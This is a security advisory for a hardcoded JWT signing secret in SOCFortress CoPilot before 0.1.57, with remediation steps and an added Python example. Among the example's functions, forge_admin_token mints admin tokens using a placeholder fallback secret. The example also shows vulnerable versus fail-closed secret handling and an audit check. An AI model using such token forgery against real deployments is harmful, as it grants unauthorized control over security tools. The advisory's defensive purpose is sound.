SOCFortress CoPilot Hardcoded JWT Secret Vulnerability Allows Unauthenticated Admin Access

Vulnerability

A vulnerability exists in SOCFortress CoPilot versions prior to 0.1.57: the authentication module falls back to a hardcoded JWT signing secret when no secret is configured. That fallback value is publicly known, since the same string ships in the example environment file. Deployments that do not explicitly set the JWT_SECRET variable, including those using the default Docker Compose configuration, therefore sign every authentication token with a compromised key. Because the server verifies tokens with that same key, an unauthenticated attacker who knows the fallback value can forge admin-scoped JWTs that pass signature verification, gaining full control over the application and all managed security tools without any credentials.

Impact

Exploitation of this vulnerability allows for complete administrative access to the SOCFortress CoPilot application and all integrated security tools, such as Wazuh, Graylog, DFIR-IRIS, Cortex, and Velociraptor, without any authentication.

Reproduction

The vulnerability can be reproduced by deploying SOCFortress CoPilot with the default Docker Compose setup and without setting the JWT_SECRET environment variable. Once the application is running, an admin JWT signed with the hardcoded secret passes the server's signature check, so the attacker is treated as an authenticated administrator without ever presenting credentials. A published proof-of-concept automates the token forgery and demonstrates the resulting impact.

Remediation

Users should update to SOCFortress CoPilot version 0.1.57 or later and ensure that the JWT_SECRET environment variable is set to a long, randomly generated value that is unique to the deployment; in particular, the value from the example environment file must not be reused, since that is the compromised secret. After updating, restart the application so it loads the new secret. Rotating the secret invalidates every token signed under the old one, so all users, including any attacker holding a forged token, must log in again. For deployments using TOTP (two-factor authentication), set the TOTP_ENCRYPTION_KEY variable before rotating JWT_SECRET to avoid losing access to enrolled TOTP secrets.
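The following is an added example, not code from SOCFortress CoPilot or from the published proof-of-concept, illustrating both the reproduction and the remediation sections above in plain Python. It implements HS256 signing and verification with the standard library, shows the vulnerable fallback pattern beside a fail-closed replacement, forges an admin token the way an attacker would, and includes an audit check an operator can run against a token issued by their own instance. The fallback string, the JWT claim names and the 32-character minimum are assumptions for illustration; the real hardcoded value is deliberately not reproduced.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Hypothetical stand-in for the publicly known fallback value; the real
# string is not reproduced here. The pattern, not the value, is the point.
KNOWN_FALLBACK_SECRET = "example-hardcoded-fallback-secret"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Build a compact HS256 JWT (header.payload.signature) using only hmac."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the claims if the token verifies under `secret`, else None.
    Only HS256 is accepted, so an 'alg: none' token is rejected outright."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # covers binascii.Error and JSONDecodeError
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(payload_b64))


def vulnerable_secret(env: dict) -> str:
    """Pre-0.1.57 pattern: silently use a constant when JWT_SECRET is unset,
    which is what an unmodified default Docker Compose deployment ends up doing."""
    return env.get("JWT_SECRET") or KNOWN_FALLBACK_SECRET


def hardened_secret(env: dict) -> str:
    """Fail-closed pattern: refuse to start without an explicit, non-default secret."""
    secret = env.get("JWT_SECRET")
    if not secret or secret == KNOWN_FALLBACK_SECRET or len(secret) < 32:
        raise RuntimeError("JWT_SECRET must be set to a unique value of at least 32 characters")
    return secret


def forge_admin_token(secret: str, lifetime_s: int = 3600) -> str:
    """Attacker's step once the signing secret is public: mint an admin-scoped token.
    Claim names here are assumed for illustration, not taken from CoPilot."""
    now = int(time.time())
    return sign_hs256({"sub": "admin", "scopes": ["admin"], "iat": now, "exp": now + lifetime_s}, secret)


def signed_with_known_secret(token: str, candidates: list) -> Optional[str]:
    """Operator audit: take a token your own instance issued after a normal login
    and report which known weak/default secret (if any) it verifies under."""
    for candidate in candidates:
        if verify_hs256(token, candidate) is not None:
            return candidate
    return None


def rotation_preflight(env: dict, totp_enrolled: bool) -> list:
    """Problems to resolve before rotating JWT_SECRET on an existing deployment."""
    problems = []
    if totp_enrolled and not env.get("TOTP_ENCRYPTION_KEY"):
        problems.append("set TOTP_ENCRYPTION_KEY first or enrolled TOTP secrets become unreadable")
    if env.get("JWT_SECRET") == KNOWN_FALLBACK_SECRET:
        problems.append("JWT_SECRET is the known fallback value; generate a fresh one")
    return problems


if __name__ == "__main__":
    default_env = {}  # default docker-compose: JWT_SECRET never set
    forged = forge_admin_token(KNOWN_FALLBACK_SECRET)
    print("vulnerable deployment accepts forged token:",
          verify_hs256(forged, vulnerable_secret(default_env)) is not None)
    fixed_env = {"JWT_SECRET": secrets.token_urlsafe(48), "TOTP_ENCRYPTION_KEY": secrets.token_urlsafe(32)}
    print("fixed deployment accepts forged token:",
          verify_hs256(forged, hardened_secret(fixed_env)) is not None)
    print("pre-rotation problems:", rotation_preflight({"JWT_SECRET": KNOWN_FALLBACK_SECRET}, True))
```

The audit function is the practical check: log in to your instance normally, paste the issued token into `signed_with_known_secret` with the example-file value as a candidate, and a non-None result means the deployment is still signing with the compromised secret even if you believe JWT_SECRET was set.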

Added: May 11, 2026, 8:42 PM
Updated: May 11, 2026, 8:42 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.0
exploitability: 8.7
remediation: 0.0
relevance: 8.0
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.